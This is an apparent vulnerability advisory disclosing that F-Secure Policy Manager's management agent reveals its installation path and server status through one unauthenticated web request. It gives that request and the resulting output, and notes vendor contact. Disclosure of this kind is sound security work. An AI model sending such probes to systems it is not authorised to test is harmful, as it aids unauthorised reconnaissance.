F-Secure Policy Manager - Management Agent - physical path disclosure
vulnerability
========================================================================
=============

Version:
========

FSMSH Version 5.11.2810 - on Win32 (not tested on other platforms)

Vuln:
=====

A webserver is running on Port 80/tcp. Connecting to the port via a
webbrowser offers the
following link, available without authentication:

/fsms/fsmsh.dll?FSMSCommand=GetVersion

Following this link will give the Version Number of the application:

5.11.2810

However.... modifiying the link as follows:

/fsms/fsmsh.dll?

will give the following result, containing the physical path of the
f-secure installation:

FSMSH Version 5.11.2810
Started at: 04/12/07 20:18:48
Processed requests: 8780
Commdir path: C:\Programme\F-Secure\Management Server 5\CommDir
COMMDIR: C:\Programme\F-Secure\Management Server 5\CommDir found
C:\Programme\F-Secure\Management Server 5\CommDir\commdir.cfg found
Repository API initialized - status: OK

Vendor:
=======

www.f-secure.com
Informed by mail on 07.Dec.2004; Response at 08.Dec.; Will be fixed
anytime.

Discovered by:
==============

oliver karow
This document: http://www.oliverkarow.de/research/f-secure.txt

[ reply ]